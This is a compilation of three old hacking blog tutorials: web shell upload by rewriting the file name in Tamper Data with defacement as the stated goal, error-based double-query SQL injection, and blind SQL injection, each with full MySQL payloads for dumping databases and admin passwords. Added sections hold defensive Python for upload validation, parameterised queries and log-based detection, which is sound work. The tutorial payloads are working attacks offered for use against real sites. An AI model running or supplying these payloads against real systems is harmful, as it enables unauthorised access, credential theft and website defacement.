
Sunday, 3 March 2013

Shell Upload Via Tamper Data

Hello Hackerz!!

Sometimes you run into trouble uploading a shell to the server in the "shell.php" format. So here's the solution.

Let's have a look.
At first, install the add-on "Tamper Data" in Mozilla Firefox. Go here for Tamper Data.

Now change the shell name into ".jpg format", like this:

shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

Now go to the uploader URL. Let the uploader URL be:

http://www.targetsite.com/upload.php

Now select your shell in the above format, but do not click the Upload button yet, because before that you have to configure Tamper Data. Open Tamper Data from Mozilla:

Firefox > Tools > Tamper Data.

So let's have a look:

Now you have to click "Start Tamper" in the Tamper Data window and start tampering. Before tampering, close all other tabs.

Now click the Upload button on your target site to upload your shell.

Now you should get a tamper request for your target site. Click Tamper.

Now you should get the "Tamper Popup" window. From here you have to change your shell format into ".php".

On the right side, have a look at the "Post Parameter Value" section and find your shell name. Change it to "shell.php" and press OK.

Great!!

Now submit.

All is done.

Now go to your shell and deface it :D :D
Source: http://www.defencexposure.com/2013/01/shell-upload-via-tamper-data.html
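Added example, not from the original post: the server-side checks that make the request-rewriting trick above irrelevant. The walk-through only works because the upload handler trusts the file name the browser sends; the Python below runs on the server, inspects every extension in the name rather than the last one, matches the file's first bytes against the claimed type, and stores the file under a server-generated name. The allowlist, the function names and the sample bytes are assumptions made for this example.

```python
"""Added example: server-side upload validation (assumed image uploader)."""
import os
import re
import secrets
from typing import Tuple

# Types this hypothetical uploader accepts, with the magic bytes each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions a web server or PHP handler may execute; any occurrence in the name is fatal.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht",
              "asp", "aspx", "jsp", "jspx", "cgi", "pl", "sh", "htaccess"}

STEM_OK = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Suspicious names are rejected, not 'cleaned up'."""
    # Keep only the last path component and drop anything after a NUL byte.
    name = os.path.basename(filename.replace("\\", "/")).split("\x00", 1)[0]
    # Split on every separator seen in the post's list ('.', ';', ':', '%'), so
    # 'shell.php;.jpg', 'shell.php.jpg' and 'shell.php.jpg:;' all expose 'php'.
    parts = [p.lower() for p in re.split(r"[.;:%]", name)]
    stem, exts = parts[0], parts[1:]
    if not STEM_OK.match(stem):
        return False, "bad characters in name"
    if any(e in EXECUTABLE for e in exts):
        return False, "executable extension present"
    if len(exts) != 1 or exts[0] not in ALLOWED:
        return False, "extension not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[exts[0]]):
        return False, "content does not match extension"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen file name; the client-supplied name never reaches the disk."""
    return f"{secrets.token_hex(16)}.{ext}"


# The names from the post, plus the one the request is rewritten to.
TUTORIAL_NAMES = ["shell.php;.jpg", "shell.php.jpg", "shell.php..jpg", "shell.php.jpg:;",
                  "shell.php.jpg%;", "shell.php.jpg;", "shell.php"]
JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 12   # constructed JPEG prefix
PHP_FILE = b"<?php echo 'x'; ?>"                    # constructed non-image body


def all_rejected() -> bool:
    """True when every name from the post is refused whatever bytes it carries."""
    return all(not validate_upload(n, body)[0]
               for n in TUTORIAL_NAMES for body in (JPEG_HEADER, PHP_FILE))


if __name__ == "__main__":
    for n in TUTORIAL_NAMES:
        print(f"{n:20s} -> {validate_upload(n, JPEG_HEADER)}")
    print("photo.jpg (real JPEG) ->", validate_upload("photo.jpg", JPEG_HEADER))
    print("photo.jpg (PHP body)  ->", validate_upload("photo.jpg", PHP_FILE))
```

The two design points are that the client's name is never used for the decision beyond the allowlisted extension (so no rewrite of a POST field can change the outcome) and that the stored name is generated on the server, so even a misconfigured handler has nothing to execute under a name the uploader chose.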

Double query (error based blind SQLi)


DOUBLE QUERY SQLI(ERROR BASED BLIND MYSQLI)

This is my first tutorial, so I don't know how to write a tut... and sorry for the wrong English.

Let's start the tutorial.


1. Test whether the site is vulnerable to SQLi or not.

Check for MySQL injection by appending a single quote to the variable:

Quote:http://www.site.com/index.php?page=1'

The result should be something like this:

Quote:MySQL Error: mysql_query (.......) error expretion syntax ...

2). Find the number of columns

To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).

Follow this until we get an error:

http://www.site.com/news.php?id=5+order+by+1+--+ (no error)

http://www.site.com/news.php?id=5+order+by+2+--+ (no error)

http://www.site.com/news.php?id=5+order+by+3+--+ (no error)

http://www.site.com/news.php?id=5+order+by+4+--+ (no error )

http://www.site.com/news.php?id=5+order+by+5+--+ (error; we get a message like "Unknown column '4' in 'order clause'" or something like that)

That means it has 4 columns, because we got an error on 5.

3). Check whether UNION works

With UNION we can select more data in one SQL statement.

So we have

http://www.site.com/news.php?id=-5+union...,2,3,4+--+ (we already found in section 2 that the number of columns is 3).

If we see some numbers on screen, i.e. 1 or 2 or 3, then UNION works. "IF UNION WORKED, WE DON'T NEED DOUBLE QUERY."

If it gives an error like this:

Quote:THE SELECT STATEMENT HAVE DIFFERENT NUMBER OF COLUMN...................etc

then it is time to use double query to get some information : )

4. Find the current database, current user, version, etc.

To find version():

Here is the code:

Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'5.0.91-community'~1' for key 1

To find database():

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'database_name~1' for key 1



To count how many databases there are and get the db names:

Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:

Quote:Duplicate entry '~'number of db~1' for key 1


To print all the databases one by one, use this code:

Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Keep incrementing the "N" in "LIMIT N,1":
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1 ..... for as long as you keep getting a response.


Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1





To find user():

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'database_name@localhost'~1' for key 1





5. Count the number of tables in the selected database and print the tables one by one:

To count the tables in the selected db:

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

NOTE: before doing this, convert your db name to hex, because it is used here in the code: "table_schema=0xhex_code_of_database_name_which_u_selected"

Output:
Quote:Duplicate entry '~'number_of_table(e.g 10)~1' for key 1



Now to print the table names one by one:

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1


Now suppose the db has 10 tables and you want all the table names; do this in the above code:

Keep incrementing the "N" in "LIMIT N,1" up to 10 times:
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
.
.
LIMIT 10,1 and you get all the table names of the selected db.

6. Get the number of columns in the selected table and print the column names that are in the table

To count the columns in the selected table:

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE: before applying this, see this part of the code: "table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name". Convert your table_name and db_name to hex.


example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x074a24c45 AND
table_name=0x074a24c4523d1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'number_of_column(e.g 5)~1' for key 1



Now it is time to print the column names in the table one by one.

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now suppose the table has 5 columns and you want all the column names; do this:

Keep incrementing the "N" in "LIMIT N,1" up to 5 times:
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
.
LIMIT 5,1 and you get all the column names of the selected table.

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x074a24c45
AND table_name=0x074a24c4523d1 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

7. Final step: fetch records from a selected column

Now we know everything: table_name and column_name.........

To fetch out the data, here is the code:
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Note: keep incrementing N here in the code ("LIMIT N,1") until you get the result...........

example:
Suppose the db name is "sandeep_1024", the table name is "admin" (which is in db sandeep_1024) and the column name is "password" (which is in table admin). Now we want the password, so we use the code like this:

Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,cast(admin.password as char),0x27,0x7e) FROM `sandeep_1024`.admin LIMIT 0,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'hack forums~1' for key 1



Source: http://voice0fblackhat.blogspot.com/2012/01/tutdouble-queryerror-based-blind.html
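Added example, not from the original tutorial: the server-side pattern behind a URL like news.php?id=5 that makes every step above possible, next to the fix. Step 1 depends on the engine's error text reaching the browser, and the double query trick depends on a "Duplicate entry" error being shown; both close once the id is typed, bound as a parameter, and errors are logged instead of rendered. The code uses Python's sqlite3 in place of MySQL with a constructed one-row table; the table, function and message names are assumptions.

```python
"""Added example: string-built query versus typed, parameterised query (constructed data)."""
import logging
import sqlite3
from typing import Callable, List

log = logging.getLogger("news")

# Constructed schema: one article with id 5, matching the tutorial's example URL.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO news VALUES (5, 'constructed article');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    # String concatenation: whatever follows '?id=' becomes part of the SQL text.
    sql = "SELECT title FROM news WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    # Enforce the type first, then let the driver bind the value. The text
    # '5 and 1=1' can never be an integer, so it never reaches the engine.
    try:
        id_value = int(raw_id)
    except ValueError:
        return []
    return [row[0] for row in conn.execute("SELECT title FROM news WHERE id=?", (id_value,))]


def render_vulnerable(conn: sqlite3.Connection, raw_id: str) -> str:
    """Page text as the tutorial's target produces it, engine errors included."""
    try:
        rows = vulnerable_lookup(conn, raw_id)
    except sqlite3.Error as exc:
        return "DB error: " + str(exc)   # the leak that step 1 and the double query rely on
    return "\n".join(rows) or "(no article)"


def render_safe(conn: sqlite3.Connection, raw_id: str) -> str:
    """Page text with both oracles closed: same output for true and false probes."""
    try:
        rows = safe_lookup(conn, raw_id)
    except sqlite3.Error:
        log.exception("news lookup failed for id=%r", raw_id)
        return "Something went wrong"     # detail goes to the server log only
    return "\n".join(rows) or "(no article)"


def page_differs(conn: sqlite3.Connection, render: Callable[[sqlite3.Connection, str], str]) -> bool:
    """True when the 'and 1=1' / 'and 1=2' pair from the tutorial yields different pages."""
    return render(conn, "5 and 1=1") != render(conn, "5 and 1=2")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler has a boolean oracle:", page_differs(db, render_vulnerable))
    print("safe handler has a boolean oracle:     ", page_differs(db, render_safe))
    print("vulnerable handler on a bare quote:", render_vulnerable(db, "5'"))
    print("safe handler on a bare quote:      ", render_safe(db, "5'"))
```

Parameter binding alone already stops the injected text from being parsed as SQL; the int() cast on top of it gives a clean rejection path, and keeping the engine's message out of the response removes the error channel that error-based extraction needs.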

Blind SQL Injection

Let's start with advanced stuff.

I will be using our example:

http://www.site.com/news.php?id=5

When we execute this, we see some page with articles, pictures, etc.

Then, when we want to test it for a blind SQL injection attack:

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's OK.

Now the real test:

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

So if some text, picture or other content is missing from the returned page, then that site is vulnerable to blind SQL injection.

1) Get the MySQL version

To get the version in a blind attack we use substring,

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

This should return TRUE if the MySQL version is 4.

Replace 4 with 5, and if the query returns TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

When select doesn't work, we use a subselect,

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

If the page loads normally, then subselects work.

Then we are going to see if we have access to mysql.user,

i.e.

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally, we have access to mysql.user, and later we can pull some passwords using the load_file() function and OUTFILE.

3). Check table and column names

This is the part where guessing is your best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, because a subselect returns only 1 row; this is very important.)

Then, if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right one :)

Let's say that we have found that the table name is users; now what we need is the column name.

The same as with the table name, we start guessing. Like I said before, try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

If the page loads normally, we know that the column name is password (if we get FALSE, then try common names or just guess).

Here we merge 1 with the column password, then substring returns the first character (,1,1).


4). Pull data from database

We found table users with columns username and password, so we are going to pull characters from them.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK, this pulls the first character of the first user in table users.

substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value,

and then we compare it with the greater-than symbol > .

So if the ASCII value is greater than 80, the page loads normally (TRUE).

We keep trying until we get FALSE.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

We get TRUE, keep incrementing.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

So the first character in username is char(99). Using the ASCII converter we know that char(99) is the letter 'c'.

Then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

We know that the second character is char(105), which is 'i'. We have 'ci' so far.

So keep incrementing until you get to the end (when >0 returns FALSE we know that we have reached the end).

There are some tools for Blind SQL Injection, I think sqlmap is the best, but I'm doing everything manually.

Source: http://voice0fblackhat.blogspot.com/2012/01/blind-sql-injection.html
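Added detection example covering both SQL injection write-ups above (the double query one and this blind one); it is not part of either post. The Python below reads web server access log lines, tags requests whose decoded query string carries the payload shapes the posts use (the and 1=1 / 1=2 pair, subselects, substring(@@version), ascii(substring(...)), floor(rand(0)*2), information_schema reads, union and order by probing), and then looks for the signature of the blind extraction loop: one client repeating the same request with only the number after > changed. The log lines are constructed, the addresses are documentation ranges, and the signature names and the burst threshold are assumptions.

```python
"""Added example: access-log detection for the probe shapes used in the two SQLi write-ups."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote_plus

SIGNATURES = {
    "boolean-probe":   re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I),
    "subselect-probe": re.compile(r"\band\s*\(\s*select\b", re.I),
    "char-extraction": re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I),
    "version-probe":   re.compile(r"\bsubstring\s*\(\s*@@version", re.I),
    "error-based":     re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "schema-read":     re.compile(r"\binformation_schema\s*\.", re.I),
    "union-probe":     re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S),
    "column-count":    re.compile(r"\border\s+by\s+\d+", re.I),
}

# Combined log format; only the fields this example needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')


def classify(url: str) -> List[str]:
    """Signature names that match the decoded query string (empty list if none)."""
    decoded = unquote_plus(url.partition("?")[2])
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def analyze(log_text: str, burst: int = 4):
    """Return (hits, alerts).

    hits:   (ip, decoded url, tags) for each request matching a signature.
    alerts: (ip, shape, count) when one client sends at least `burst` flagged
            requests that differ only in numeric literals, the fingerprint of
            walking one character value with >80, >95, >98, >99, ...
    """
    hits: List[Tuple[str, str, List[str]]] = []
    shapes: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["url"])
        if not tags:
            continue
        decoded = unquote_plus(m["url"])
        hits.append((m["ip"], decoded, tags))
        shapes[(m["ip"], re.sub(r"\d+", "#", decoded))].add(decoded)
    alerts = [(ip, shape, len(seen)) for (ip, shape), seen in shapes.items() if len(seen) >= burst]
    return hits, alerts


# Constructed sample: two ordinary readers' requests, then the probe sequence from the posts.
EXTRACT = "/news.php?id=5+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+limit+0,1),1,1))>"
ERROR_BASED = ("/news.php?id=5+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,"
               "cast(version()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),"
               "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1")
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [03/Mar/2013:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4120',
    '203.0.113.7 - - [03/Mar/2013:10:00:02 +0000] "GET /news.php?id=7 HTTP/1.1" 200 3980',
    '198.51.100.9 - - [03/Mar/2013:10:01:00 +0000] "GET /news.php?id=5+and+1=1 HTTP/1.1" 200 4120',
    '198.51.100.9 - - [03/Mar/2013:10:01:01 +0000] "GET /news.php?id=5+and+1=2 HTTP/1.1" 200 1130',
    '198.51.100.9 - - [03/Mar/2013:10:01:02 +0000] "GET /news.php?id=5+and+substring(@@version,1,1)=5 HTTP/1.1" 200 4120',
] + [f'198.51.100.9 - - [03/Mar/2013:10:01:{3 + i:02d} +0000] "GET {EXTRACT}{n} HTTP/1.1" 200 4120'
     for i, n in enumerate((80, 95, 98, 99))]
  + [f'198.51.100.9 - - [03/Mar/2013:10:01:07 +0000] "GET {ERROR_BASED} HTTP/1.1" 500 612'])


if __name__ == "__main__":
    found, bursts = analyze(SAMPLE_LOG)
    for ip, url, tags in found:
        print(ip, ",".join(tags), url[:70])
    for ip, shape, n in bursts:
        print(f"ALERT {ip}: {n} variants of {shape[:60]}...")
```

The burst check is only computed over requests that already matched a signature, so ordinary readers paging through article ids never trip it; its value is separating a one-off probe from an extraction loop, which is what should drive the response priority. In production the same signatures belong in a WAF rule set or SIEM query, and the decoded query string should be matched after URL decoding exactly as here, since the posts' payloads arrive with + and %xx encoding.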